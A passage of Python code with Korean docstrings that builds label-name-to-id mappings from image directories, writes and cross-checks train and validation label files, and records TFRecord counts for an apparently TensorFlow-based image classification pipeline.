for label_name in sorted(os.listdir(data_dir)):
path = os.path.join(data_dir, label_name)
if os.path.isdir(path):
image_file_path = '%s/*' % (path)
matching_files = tf.gfile.Glob(image_file_path)
id_to_name[label_index] = label_name
label_index += 1
return id_to_name
def make_label_name_to_id(data_dir, start_index=0):
"""
레이블 이름이 디렉토리인 경우 이를 읽어 학습에 사용할 label id 로 매핑하는 함수.
아래와 같은 형식의 데이터를 {labelA:0, labelB:1} 와 같은 dict 객체로 변환한다.
data_dir/labelA/xxx.jpg
data_dir/labelB/yyy.jpg
:param data_dir: 레이블 디렉토리가 포함된 상위 디렉토리 이름.
:return: id[name] 형식의 dict 객체.
"""
name_to_id = {}
label_index = 0 + start_index
# os.listdir()은 순서를 보장하지 않으므로 반드시 sort하여 사용.
for label_name in sorted(os.listdir(data_dir)):
path = os.path.join(data_dir, label_name)
if os.path.isdir(path):
name_to_id[label_name] = label_index
label_index += 1
return name_to_id
def write_label_id_to_name(name, data_dir, output_dir=None, start_index=0):
"""
id_to_name 정보를 data_dir 에 기록한다.
:param name: 저장할 데이터의 타입. ex) train, validation
:param data_dir: 레이블 디렉토리가 포함된 상위 디렉토리 이름.
:param output_dir: 파일을 기록할 경로 디렉토리. None 인 경우 data_dir을 사용.
"""
id_to_name = make_label_id_to_name(data_dir, start_index)
output_filename = '%s_labels.txt' % (name)
if not output_dir:
output_dir = data_dir
output_file = os.path.join(output_dir, output_filename)
with open(output_file, 'w') as f:
for index in sorted(id_to_name):
f.write('%d:%s\n' % (index, id_to_name[index]))
def check_label_id_to_name_files(data_dir, train_name='train', validation_name='validation'):
train_filename = os.path.join(data_dir, '%s_labels.txt' % (train_name))
validation_filename = os.path.join(data_dir, '%s_labels.txt' % (validation_name))
def _load_id_to_name(filename):
id_to_name = {}
with open(filename, 'r') as f:
labels = f.readlines()
for label in labels:
label_id, name = label.strip().split(':', 2)
id_to_name[int(label_id)] = name
return id_to_name
train = _load_id_to_name(train_filename)
validation = _load_id_to_name(validation_filename)
for key, val in train.items():
if not key in validation:
log("Warn: The label index (%d:%s) is not exist in validation but train." % (key, val))
elif val != validation[key]:
msg = "train(%d:%s) vs. validation(%d:%s)" % (key, val, key, validation[key])
raise ValueError("Invalid label : {}".format(msg))
for key, val in validation.items():
if not key in train:
msg = "valdation(%d:%s) is not exist in train label." % (key, val)
raise ValueError("Invalid label : {}".format(msg))
def write_tfrecord_info(output_dir, num_train, num_validation):
"""
train, validation 정보를 파일에 기록한다.
:param output_dir: 파일을 기록할 경로 디렉토리. None 인 경우 data_dir을 사용.
:param num_train: train 데이터 갯수
:param num_validation: validation 데이터 갯수
"""
id_to_name = make_label_id_to_name(output_dir)
output_filename = 'tfrecord_info.txt'
output_file = os.path.join(output_dir, output_filename)
with open(output_file, 'w') as f:
f.write('tfrecord info\n')
f.write('- train: %s\n' % (num_train))
f.write('- validation: %s\n' % (num_validation))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.